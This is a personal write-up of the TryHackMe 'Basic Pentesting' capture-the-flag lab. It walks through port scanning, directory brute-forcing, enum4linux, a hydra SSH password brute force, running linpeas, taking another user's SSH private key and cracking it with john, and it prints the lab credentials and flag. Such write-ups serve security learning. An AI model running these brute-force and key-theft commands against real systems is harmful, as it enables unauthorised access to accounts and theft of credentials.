3 minutes
THM_Basic_PenTest_Walkthrough
Basic PenTesting TryHackMe
performed by: jb-williams
Summary
-
Hidden directory on webserver(
development
, found via dirbuster&rockyou). -
Username (
jan
andkay
found via enum4linux). -
Password(
jan:armando
found via hydra with ssh). -
Private SSH Key found with Linpeas.
-
Cracked SSH Key
-
Was able to login and read
pass.bak
User | Pass | Service | SSH Key | IP | Port |
---|---|---|---|---|---|
jan | armando | ssh | ———- | 10.10.62.206 | 22 |
kay | beeswax | ssh | kay_id_rsa | 10.10.62.206 | 22 |
Ports | Services |
---|---|
22 | SSH 7.2 |
80 | Apache 2.4.18 |
139 | SMB 3.X -4.X |
445 | SMB 4.3.11 |
8009 | Apache Jserv 1.3 |
8080 | Apache tomcat 9.0.7 |
Scanning & Enumeration
- Scanned Machine on the network:
IP:
10.10.62.206
- Discovered these ports and services running on the device.
Ports:
22 - ssh 7.2
80 - apache 2.4.18
139 - SMB 3.X - 4.X
445 - SMB 4.3.11
8009- Apache Jserv 1.3
8080 Apache tomcat 9.0.7
-
Began enumeration on the webpage on port 80 with Dirbuster:
-
Discovered:
/development/*
/development/dev.txt
/development/j.txt
-
/development/dev.txt
talks aboutApache Struts 2.5.12
, as well as initials of what I assume are employees:- Found initials:
-K
and-J
- Found initials:
-
In
/development/j.txt
, found a message that was fromK
is tellingJ
that they have a weak password that can be cracked easily.
Brute Forcing
- Ran enum4linux on the target IP, splitting the output to STDOUT and a file:
enum4linux -a 10.10.62.206 | tee -a enum4linux.log
-
Enum4linux found the full usernames
Kay
andJan
: -
Bruteforced ssh to find
Jan's
password:
hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.10.62.206
- Credentials that were Found:
User | Pass | Service | IP | Port |
---|---|---|---|---|
jan | armando | ssh | 10.10.62.206 | 22 |
- Verified login credentials.
Internal Enumeration
-
Logged into
jan
’s account through ssh. -
I was able to move traverse over to
/home/kay
, and say there was apass.bak
file -
However, I was unable to read anything in
/home/kay
. -
From my host, I used ssh to transfer Linpeas to the Machine into the shared memory:
scp /opt/linpeas/linpeas.sh jan@10.10.62:/dev/shm
ssh jan@10.10.62.206
chmod +x linpeas.sh && ./linpeas.sh | tee linlog.txt
- This enumeration brought me to Kay’s Private SSH key that I was able to read.
/home/kay/.ssh/id_rsa
- I copied to my host and changed the permissions on it.
chmod 600 kay_id_rsa
- Discovered the SSH Key was password protected, so I sent it to
ssh2john
, out put it into a text doc to then runjohn
on it.
python3 /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
john forjohn.txt
-
John found
kay's
password:beeswax
-
SSH’d into the machine as
Kay
:
ssh -i kay_id_rsa kay@10.10.62.206
beeswax
User | Pass | Service | SSH Key | IP | Port |
---|---|---|---|---|---|
kay | beeswax | ssh | kay_id_rsa | 10.10.62.206 | 22 |
- As
Kay
I was able to read thatpass.bak
file:
cat pass.bak
- With that I was able to find the Password/Last Flag:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
written and performed by jb-williams - github
linux ssh bruteforce password-cracking enumeration walkthrough web app tryhackme basic-pentesting
433 Words
2022-09-17 18:46